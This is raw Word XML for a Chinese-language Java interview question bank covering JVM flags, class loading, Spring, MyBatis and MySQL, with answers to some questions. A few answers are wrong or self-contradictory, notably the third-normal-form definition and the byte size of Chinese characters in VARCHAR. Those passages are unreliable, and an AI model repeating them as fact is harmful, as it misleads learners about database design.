          <w:numId w:val="1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JVM 的一些参数？</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JVM（Java Virtual Machine，Java虚拟机）是Java程序的运行环境，可以在不同的平台上运行Java代码。在启动JVM时，可以通过一些参数来控制JVM的行为。以下是一些常用的JVM参数：</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-Xmx：指定JVM最大可用内存大小，例如“-Xmx1g”表示最大可用内存为1GB。</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-Xms：指定JVM初始内存大小，例如“-Xms256m”表示初始内存为256MB。</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-XX:MaxPermSize：指定永久代（PermGen）的最大大小，例如“-XX:MaxPermSize=256m”表示最大永久代大小为256MB。</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-XX:+UseConcMarkSweepGC：启用并发标记清除垃圾收集器。</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-XX:+PrintGCDetails：打印垃圾收集器的详细信息。</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-XX:+HeapDumpOnOutOfMemoryError：在内存溢出时生成堆转储文件。</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-XX:NewRatio：设置新生代（Young Gen）与老年代（Old Gen）的比例，默认为2，表示新生代占总堆内存的1/3。</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-XX:SurvivorRatio：设置新生代中Eden区域和Survivor区域的比例，默认为8，表示Eden区域与Survivor区域的比例为8:1:1。</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-XX:MetaspaceSize：指定元空间（Metaspace）初始大小。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepNext w:val="0"/>
        <w:keepLines w:val="0"/>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1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-XX:+UseG1GC：启用G1垃圾收集器。</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谈谈你对类文件结构的理解？有哪些部分组成？</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谈谈你对类加载机制的了解？</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类加载各阶段的作用分别是什么？</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有哪些类加载器？分别有什么作用？</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类与类加载器的关系?</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谈谈你对双亲委派模型的理解？工作过程？为什么要使用</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怎么实现一个自定义的类加载器？需要注意什么？</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怎么打破双亲委派模型？</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有哪些实际场景是需要打破双亲委派模型的？</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谈谈你对编译期优化和运行期优化的理解？</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为何 HotSpot 虚拟机要使用解释器与编译器并存的架构？</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说下你对 Java 内存模型的理解？</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepNext w:val="0"/>
        <w:keepLines w:val="0"/>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1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内存间的交互操作有哪些？需要满足什么规则？</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六、SSM框架 37 道</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepNext w:val="0"/>
        <w:keepLines w:val="0"/>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1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使用 Spring 框架的好处是什么？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Spring 框架是一个流行的 Java 开发框架，具有以下好处：</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轻量级：Spring 框架是轻量级的，可以在不使用太多内存的情况下运行。它使用了依赖注入（DI）和面向切面编程（AOP）等技术来实现轻量级，从而使开发过程更加简单和高效。</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松散耦合：Spring 框架通过 DI 和接口编程等方式实现了松散耦合，使组件之间的依赖性降低。这样做可以提高代码的可维护性和可测试性，并且使代码更加灵活。</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面向切面编程（AOP）：Spring 框架支持 AOP 编程范式，可以在不修改业务逻辑的情况下改变应用程序的行为。AOP 可以用于实现事务管理、安全、缓存等功能。</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容器：Spring 框架提供了一个容器，可以管理对象的生命周期和依赖关系。这个容器可以自动实例化和装配对象，简化了应用程序的配置和管理。</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数据库访问：Spring 框架提供了一个称为 Spring JDBC 的模块，可以使数据库访问更加容易和高效。Spring 还提供了一个称为 Spring ORM 的模块，可以轻松地集成与 Hibernate、JPA 等 ORM 框架的交互。</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安全性：Spring 框架提供了许多安全性选项，包括基于角色的访问控制、安全认证和身份验证等。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepNext w:val="0"/>
        <w:keepLines w:val="0"/>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1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可测试性：Spring 框架通过 DI 技术和接口编程等方式实现了松散耦合，从而使代码更容易测试。这个特性使得 Spring 框架成为一个可测试的框架。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综上所述，Spring 框架具有轻量级、松散耦合、AOP、容器、数据库访问、安全性和可测试性等优势，是 Java 开发人员的首选框架之一。</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解释下什么是 AOP？</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AOP 的代理有哪几种方式？</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怎么实现 JDK 动态代理？</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AOP 的基本概念：切面、连接点、切入点等？</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通知类型（Advice）型（Advice）有哪些？</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IOC 的理解？</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepNext w:val="0"/>
        <w:keepLines w:val="0"/>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1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Bean 的生命周期？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在Spring中，Bean的生命周期包括以下阶段：</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实例化：Spring容器使用反射机制实例化Bean对象。</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属性赋值：Spring容器将配置文件或注解中配置的属性值通过setter方法赋给Bean对象。</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自定义初始化方法：如果在配置文件或注解中定义了初始化方法，则Spring容器会调用该方法来完成Bean对象的初始化。如果没有定义，则Spring容器会跳过此步骤。</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Bean后处理器的前置处理方法：Spring容器会遍历所有的Bean后处理器（BeanPostProcessor），并调用它们的postProcessBeforeInitialization方法来进行一些前置处理操作。</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初始化方法：Spring容器会调用Bean对象的初始化方法（如果有定义的话）来完成Bean对象的初始化。</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Bean后处理器的后置处理方法：Spring容器会遍历所有的Bean后处理器，并调用它们的postProcessAfterInitialization方法来进行一些后置处理操作。</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使用：Bean对象可以被应用程序使用。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepNext w:val="0"/>
        <w:keepLines w:val="0"/>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1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销毁：当Spring容器关闭时，它会调用Bean对象的销毁方法（如果有定义的话）来完成Bean对象的清理工作。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepNext w:val="0"/>
        <w:keepLines w:val="0"/>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="14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Bean 的作用域?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在Spring中，Bean的作用域（Scope）指的是Bean对象在容器中存在的生命周期及范围，主要有以下几种作用域：</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Singleton：默认作用域，容器中只存在一个Bean对象实例，所有对该Bean的请求都将返回同一个对象。</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Prototype：每次请求都会创建一个新的Bean实例。</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Request：每个HTTP请求都会创建一个新的Bean实例，该作用域仅适用于Web应用程序上下文。</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Session：每个HTTP会话都会创建一个新的Bean实例，该作用域仅适用于Web应用程序上下文。</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GlobalSession：基于Portlet的Web应用程序才有该作用域，它表示整个portlet应用程序中只有一个Bean实例。</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Application：表示整个应用程序中只有一个Bean实例。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepNext w:val="0"/>
        <w:keepLines w:val="0"/>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1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WebSocket：每个WebSocket会话都会创建一个新的Bean实例。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可以通过在Bean的声明中设置“scope”属性来指定Bean的作用域，例如：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&lt;bean id="myBean" class="com.example.MyBean" scope="singleton"&gt;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&lt;!-- properties configuration --&gt;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&lt;/bean&gt;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或者使用注解方式：</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@Component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@Scope("prototype")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public class MyBean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 ...</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1ABC9C" w:sz="12" w:space="0"/>
          <w:shd w:val="clear" w:fill="F6F8FA"/>
        </w:rPr>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepNext w:val="0"/>
        <w:keepLines w:val="0"/>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1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 中的单例 Bean 的线程安全问题了解吗？</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在Spring中，单例（Singleton）作用域的Bean默认是非线程安全的，因为一个单例Bean实例在整个应用程序中只存在一个，如果多个线程同时调用该Bean实例的方法，可能会导致线程安全问题。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如果在单例Bean中需要处理共享数据，可以采取以下几种方式来确保线程安全：</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepNext w:val="0"/>
        <w:keepLines w:val="0"/>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1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同步方法：使用synchronized关键字来确保在同一时刻只有一个线程能够访问Bean实例的方法。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepNext w:val="0"/>
        <w:keepLines w:val="0"/>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1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同步块：使用synchronized关键字来锁定共享数据的代码块，确保在同一时刻只有一个线程能够访问共享数据。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepNext w:val="0"/>
        <w:keepLines w:val="0"/>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1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使用ThreadLocal：将共享数据存储在ThreadLocal变量中，确保每个线程都有自己的数据副本，从而避免线程安全问题。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepNext w:val="0"/>
        <w:keepLines w:val="0"/>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1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使用并发集合：使用线程安全的并发集合，例如ConcurrentHashMap、ConcurrentLinkedQueue等，来存储共享数据。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使用上述方法来确保线程安全会增加额外的开销和复杂度，因此应该在确保线程安全的前提下，尽量避免在单例Bean中处理共享数据。同时，在多线程环境下，使用原型（Prototype）作用域的Bean能够更好地提供线程安全的保障</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Spring 中的事物的理解？</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 中的事务隔离级别？</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 中的事物传播行为？</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 常用的注入方式有哪些？</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 框架中用到了哪些设计模式？</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ApplicationContext 通常的实现有哪些?</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MVC 模式的理解？</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的工作原理/执行流程？</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的核心组件有哪些？</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常用的注解有哪些？</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@RequestMapping 的作用是什么？</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如何解决 POST 请求中文乱码问题，GET 的又如何处理呢？</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的控制器是不是单例模式，如果是会有什么问题，怎么解决？</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怎么样设定重定向和转发的？</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里面拦截器是怎么写的？</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SpringMVC 和 Struts2 的区别有哪些?</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MyBatis 的理解？</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MyBaits 的优缺点有哪些？</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与 Hibernate 有哪些不同？</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中 #{} 和 ${}的区别是什么？</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是如何进行分页的？分页插件的原理是什么？</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有几种分页方式？</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逻辑分页和物理分页的区别是什么？</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是否支持延迟加载？如果支持，它的实现原理是什么？</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说一下 MyBatis 的一级缓存和二级缓存？</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有哪些执行器（Executor）？</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepNext w:val="0"/>
        <w:keepLines w:val="0"/>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1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MyBatis 动态 SQL 是做什么的？都有哪些动态 SQL？能简述一下动态 SQL的执行原理不？</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七、MySQL 31 道</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepNext w:val="0"/>
        <w:keepLines w:val="0"/>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="15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请说下你对 MySQL 架构的了解？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是一种开源的关系型数据库管理系统，其架构可以分为三个主要部分：客户端、服务端和存储引擎。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepNext w:val="0"/>
        <w:keepLines w:val="0"/>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1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客户端：客户端是用户与 MySQL 交互的接口，它包括命令行工具、图形化管理工具和应用程序等。客户端向 MySQL 服务器发送 SQL 查询和命令，并接收服务器的响应结果。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepNext w:val="0"/>
        <w:keepLines w:val="0"/>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1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服务端：服务端是 MySQL 的核心部分，它包括连接处理、查询处理、事务处理、权限管理、数据存储和备份等功能。服务端接收来自客户端的 SQL 查询和命令，执行查询和命令，然后将结果返回给客户端。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepNext w:val="0"/>
        <w:keepLines w:val="0"/>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1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存储引擎：存储引擎是 MySQL 的插件式架构，它负责数据的存储和检索。MySQL 支持多种存储引擎，包括 MyISAM、InnoDB、Memory、CSV、Archive 等，每种存储引擎都有其特点和适用场景。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MySQL 的架构中，客户端与服务端之间的通信使用 TCP/IP 协议，而服务端与存储引擎之间的通信使用 API 接口。MySQL 的架构灵活，用户可以根据实际需求选择不同的存储引擎，以满足不同的性能、安全性和可靠性要求。同时，MySQL 也提供了丰富的配置选项和监控工具，方便用户对数据库进行管理和优化。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepNext w:val="0"/>
        <w:keepLines w:val="0"/>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1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MySQL的varchar是字符还是字节，varchar10存储多少汉字</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MySQL 中，</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="8"/>
          <w:rFonts w:hint="eastAsia" w:ascii="黑体" w:hAnsi="黑体" w:eastAsia="黑体" w:cs="黑体"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:caps w:val="0"/>
          <w:color w:val="32CA99"/>
          <w:spacing w:val="0"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
          <w:bdr w:val="single" w:color="DDDDDD" w:sz="2" w:space="0"/>
          <w:shd w:val="clear" w:fill="EEFAF7"/>
        </w:rPr>
        <w:t>VARCHAR</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="黑体" w:hAnsi="黑体" w:eastAsia="黑体" w:cs="黑体"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:caps w:val="0"/>
          <w:color w:val="333333"/>
          <w:spacing w:val="0"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:bdr w:val="none" w:color="auto" w:sz="0" w:space="0"/>
          <w:shd w:val="clear" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t xml:space="preserve"> 是字符类型，用来存储字符串类型的数据。</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="8"/>
          <w:rFonts w:hint="eastAsia" w:ascii="黑体" w:hAnsi="黑体" w:eastAsia="黑体" w:cs="黑体"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:caps w:val="0"/>
          <w:color w:val="32CA99"/>
          <w:spacing w:val="0"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
          <w:bdr w:val="single" w:color="DDDDDD" w:sz="2" w:space="0"/>
          <w:shd w:val="clear" w:fill="EEFAF7"/>
        </w:rPr>
        <w:t>VARCHAR</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="黑体" w:hAnsi="黑体" w:eastAsia="黑体" w:cs="黑体"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:caps w:val="0"/>
          <w:color w:val="333333"/>
          <w:spacing w:val="0"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:bdr w:val="none" w:color="auto" w:sz="0" w:space="0"/>
          <w:shd w:val="clear" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t xml:space="preserve"> 可以存储任何字符，包括汉字，其长度是根据字符数来计算的，而不是根据字节数。所以，如果将 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="8"/>
          <w:rFonts w:hint="eastAsia" w:ascii="黑体" w:hAnsi="黑体" w:eastAsia="黑体" w:cs="黑体"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:caps w:val="0"/>
          <w:color w:val="32CA99"/>
          <w:spacing w:val="0"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
          <w:bdr w:val="single" w:color="DDDDDD" w:sz="2" w:space="0"/>
          <w:shd w:val="clear" w:fill="EEFAF7"/>
        </w:rPr>
        <w:t>VARCHAR(10)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="黑体" w:hAnsi="黑体" w:eastAsia="黑体" w:cs="黑体"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:caps w:val="0"/>
          <w:color w:val="333333"/>
          <w:spacing w:val="0"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:bdr w:val="none" w:color="auto" w:sz="0" w:space="0"/>
          <w:shd w:val="clear" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t xml:space="preserve"> 用来存储汉字，则最多可以存储 10 个汉字。</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需要注意的是，由于汉字采用的是 Unicode 编码，每个汉字需要占用 2 个字节，而 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="8"/>
          <w:rFonts w:hint="eastAsia" w:ascii="黑体" w:hAnsi="黑体" w:eastAsia="黑体" w:cs="黑体"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:caps w:val="0"/>
          <w:color w:val="32CA99"/>
          <w:spacing w:val="0"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
          <w:bdr w:val="single" w:color="DDDDDD" w:sz="2" w:space="0"/>
          <w:shd w:val="clear" w:fill="EEFAF7"/>
        </w:rPr>
        <w:t>VARCHAR</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="黑体" w:hAnsi="黑体" w:eastAsia="黑体" w:cs="黑体"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:caps w:val="0"/>
          <w:color w:val="333333"/>
          <w:spacing w:val="0"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:bdr w:val="none" w:color="auto" w:sz="0" w:space="0"/>
          <w:shd w:val="clear" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t xml:space="preserve"> 类型的长度是以字符为单位计算的。因此，如果采用 UTF-8 编码，一个汉字通常占用 3 个字节，而如果采用 UTF-16 编码，则一个汉字占用 2 个字节。如果采用 GBK 或 GB2312 编码，则一个汉字占用 2 个字节。因此，在选择 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="8"/>
          <w:rFonts w:hint="eastAsia" w:ascii="黑体" w:hAnsi="黑体" w:eastAsia="黑体" w:cs="黑体"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:caps w:val="0"/>
          <w:color w:val="32CA99"/>
          <w:spacing w:val="0"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
          <w:bdr w:val="single" w:color="DDDDDD" w:sz="2" w:space="0"/>
          <w:shd w:val="clear" w:fill="EEFAF7"/>
        </w:rPr>
        <w:t>VARCHAR</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="黑体" w:hAnsi="黑体" w:eastAsia="黑体" w:cs="黑体"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:caps w:val="0"/>
          <w:color w:val="333333"/>
          <w:spacing w:val="0"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:bdr w:val="none" w:color="auto" w:sz="0" w:space="0"/>
          <w:shd w:val="clear" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t xml:space="preserve"> 的长度时，需要根据具体的字符集和编码方式来进行选择。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepNext w:val="0"/>
        <w:keepLines w:val="0"/>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1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为什么使用索引，使用索引的好处？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是一种数据结构，它可以加速数据库查询操作。在数据库中，如果表中的数据量很大，每次查询时需要遍历整个表，这样会非常耗时。而索引可以将表中的数据按照一定的规则进行排序和分类，并将排序后的数据存储在一个索引结构中，使得查询时只需要查找索引即可，而不必遍历整个表。这样就大大提高了查询效率，减少了查询时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索引的好处包括：</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepNext w:val="0"/>
        <w:keepLines w:val="0"/>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1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提高查询效率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索引可以加快查询速度，当需要查询表中的某个特定数据时，只需要查找索引中的位置，而不需要遍历整个表。这样可以大大减少查询的时间，提高查询效率。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2.加速排序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索引是按照一定规则排序后的数据结构，可以快速进行排序，这对于需要排序的查询操作非常有用。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3.提高数据唯一性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索引可以保证表中数据的唯一性，例如可以使用唯一索引保证某个字段的值在整个表中唯一。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4.加速数据检索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索引可以帮助数据库进行数据检索，例如可以使用全文索引来加速对文本数据的检索。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5.提高数据库性能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索引可以提高数据库的性能，减少查询时间，从而提高数据库的吞吐量和并发性能。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虽然索引有很多好处，但是它也有一些缺点。例如，索引需要占用额外的存储空间，当表中的数据发生变化时，需要对索引进行更新，这会增加数据库的负担。因此，需要根据具体情况来决定是否使用索引，以达到最优的数据库性能。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepNext w:val="0"/>
        <w:keepLines w:val="0"/>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1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一条 SQL 语句在数据库框架中的执行流程？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SQL语句在数据库框架中的执行流程通常如下：</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepNext w:val="0"/>
        <w:keepLines w:val="0"/>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1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语法解析：首先数据库框架会对SQL语句进行语法解析，验证SQL语句的正确性，并且对其中的关键字、表名、列名等信息进行提取。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepNext w:val="0"/>
        <w:keepLines w:val="0"/>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1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查询优化：数据库框架会对查询语句进行优化，找到最优的执行计划。优化过程中包括：分析查询语句、生成执行计划、评估执行计划的成本等。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepNext w:val="0"/>
        <w:keepLines w:val="0"/>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1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执行计划的生成：在查询优化的过程中，数据库框架会根据表的统计信息和索引信息等生成最优的执行计划。执行计划包括：使用哪些索引、使用哪些算法、执行顺序等。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepNext w:val="0"/>
        <w:keepLines w:val="0"/>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1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执行计划的执行：执行计划执行的过程中，数据库框架会根据执行计划依次执行各个子查询，执行结果会暂时存储在内存或者临时表中。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepNext w:val="0"/>
        <w:keepLines w:val="0"/>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1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结果返回：执行计划执行结束后，数据库框架会将结果返回给客户端。如果结果比较大，可以采用分页、压缩等技术减少网络传输的开销。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepNext w:val="0"/>
        <w:keepLines w:val="0"/>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1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事务处理：如果SQL语句是在事务内执行，数据库框架会保证在事务提交之前所有的语句都要执行成功。如果其中任意一条语句执行失败，则整个事务都会回滚。</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以上是SQL语句在数据库框架中的一个大致执行流程，具体实现会根据数据库系统的不同而有所差异。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepNext w:val="0"/>
        <w:keepLines w:val="0"/>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="15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索引失效的场景有那些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索引是一种用于加速数据库查询操作的数据结构。虽然索引可以提高查询效率，但是在某些情况下，索引可能会失效，导致查询变得非常慢或者根本无法使用索引。以下是一些常见的导致索引失效的场景：</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对索引列进行了函数操作：如果在查询中对索引列进行了函数操作，如 substr、lower、upper 等，那么这个查询就无法使用索引，因为索引只能对列进行直接匹配。</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对索引列使用了类型转换：如果在查询中对索引列进行了类型转换，如 CAST、CONVERT 等，那么这个查询也无法使用索引。</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OR 条件：如果查询中包含了 OR 条件，而这些条件不都可以使用同一个索引，那么这个查询也无法使用索引。这是因为每个条件可能需要使用不同的索引，这会导致查询的效率变得非常低。</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对索引列使用了函数索引：如果在创建索引时使用了函数索引，如 LOWER(column_name)，那么只有在查询中也使用了这个函数才能使用这个索引，否则这个索引也无法使用。</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对索引列进行了算术运算：如果在查询中对索引列进行了算术运算，如 column_name + 1，那么这个查询也无法使用索引。</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对索引列进行了隐式类型转换：如果在查询中对索引列进行了隐式类型转换，如将一个字符串类型的列与一个数字类型的常量进行比较，那么这个查询也无法使用索引。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepNext w:val="0"/>
        <w:keepLines w:val="0"/>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1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对索引列进行了模糊查询：如果在查询中对索引列进行了模糊查询，如 LIKE、NOT LIKE 等，而模糊查询的模式以 % 或 _ 开头，那么这个查询也无法使用索引。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需要注意的是，以上只是一些常见的导致索引失效的场景，实际情况可能更加复杂。在实际开发中，需要根据具体的查询情况和数据库结构来进行优化和调整，以尽可能地提高查询效率。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepNext w:val="0"/>
        <w:keepLines w:val="0"/>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="15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数据库的三范式是什么？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数据库三范式（3NF）是关系型数据库设计中的一种规范化设计技术，它通过规范化数据库中的数据结构，减少数据冗余，避免数据更新异常，提高数据存储和查询效率。具体而言，3NF 要求一个关系表（或数据表）符合以下三个规范化要求：</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepNext w:val="0"/>
        <w:keepLines w:val="0"/>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1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第一范式（1NF）：每个字段必须是原子性的，不可再分。换句话说，每个字段只能存储一个值。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepNext w:val="0"/>
        <w:keepLines w:val="0"/>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1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第二范式（2NF）：每个非主键字段必须完全依赖于主键，而不能只依赖于主键的一部分。也就是说，表中每个非主键字段必须与主键有直接关系。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepNext w:val="0"/>
        <w:keepLines w:val="0"/>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1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第三范式（3NF）：在满足 1NF 和 2NF 的基础上，每个非主键字段之间不能存在传递依赖关系。也就是说，如果 A -&gt; B，B -&gt; C，那么 C 就必须是 A 的主键或部分主键。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通过符合以上三个规范化要求，可以有效地避免数据冗余，减少数据更新异常，提高数据库的性能和可维护性。不过，过度的规范化也可能会影响查询效率和可维护性，因此在实际设计时需要根据具体情况权衡各种因素。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepNext w:val="0"/>
        <w:keepLines w:val="0"/>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1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char 和 varchar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在关系型数据库中，char 和 varchar 是两种不同的数据类型，用于存储字符数据。它们的主要区别在于存储方式和存储限制。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepNext w:val="0"/>
        <w:keepLines w:val="0"/>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1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char 数据类型：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char 表示固定长度的字符串类型，需要指定一个固定的长度，例如 char(10)，表示存储长度为 10 的字符串。char 类型会预先分配一定长度的存储空间，不足的部分用空格填充。因此，char 类型的数据存储是定长的，不管实际存储的数据长度是否达到了指定的长度，都会占用固定的存储空间。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepNext w:val="0"/>
        <w:keepLines w:val="0"/>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1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varchar 数据类型：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varchar 表示可变长度的字符串类型，需要指定一个最大长度，例如 varchar(255)，表示可以存储最长为 255 个字符的字符串。varchar 类型的数据存储是变长的，存储的实际长度取决于实际存储的数据长度。因此，varchar 类型的数据存储空间是根据实际存储的数据长度动态分配的，节约存储空间。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因此，char 类型适用于固定长度的字符串，例如存储邮政编码或身份证号等固定长度的数据，而 varchar 类型适用于长度不固定的字符串，例如存储文章的内容或用户的评论等。需要注意的是，由于 char 类型的数据存储是定长的，因此在存储大量的短字符串时可能会浪费存储空间，而 varchar 类型可以节省存储空间</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepNext w:val="0"/>
        <w:keepLines w:val="0"/>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="0"/>
